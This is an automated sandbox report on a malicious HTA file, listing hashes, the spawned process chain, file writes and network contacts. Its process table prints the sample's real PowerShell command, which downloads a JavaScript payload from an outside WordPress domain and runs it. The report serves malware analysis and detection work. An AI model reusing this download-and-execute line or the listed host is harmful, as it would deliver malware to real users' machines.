File name: | microsoft.hta |
Full analysis: | https://app.any.run/tasks/ab548116-18c9-4d9f-a6fc-4872036de6e9 |
Verdict: | Malicious activity |
Analysis date: | June 18, 2019, 18:33:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | data |
MD5: | 07BFF8ED96D8E0B1506D20ABDE5756EE |
SHA1: | 4A25CEBFE05C7C036B2B9BDBE8666A961BD74DE0 |
SHA256: | 30FBF1044F594AEE5E44F96C07D2A7BC8FD31A944BBA99A3F90EBC2369A0787C |
SSDEEP: | 6144:pxCVSE/xFoNclS2BqA6nz1DeR7UDcNGTR7Xd0IC7mCr1:pxCVSE/xFoG824PDeR7UDcETVNu |
.html | | | HyperText Markup Language (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2964 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\microsoft.hta" | C:\Windows\System32\mshta.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2336 | "C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','%temp%\microsoft.js'); Start '%temp%\microsoft.js' | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3248 | powershell (new-object System.Net.WebClienT).DownloadFile('https://briargrove.org/wp-includes/microsoft.js','C:\Users\admin\AppData\Local\Temp\microsoft.js'); Start 'C:\Users\admin\AppData\Local\Temp\microsoft.js' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3248 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U8CLEZH6M357UUHOHQ0J.temp | — | |
MD5:— | SHA256:— | |||
3248 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF120f4a.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3248 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3248 | powershell.exe | 166.62.121.61:443 | briargrove.org | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
briargrove.org |
| suspicious |
dns.msftncsi.com |
| shared |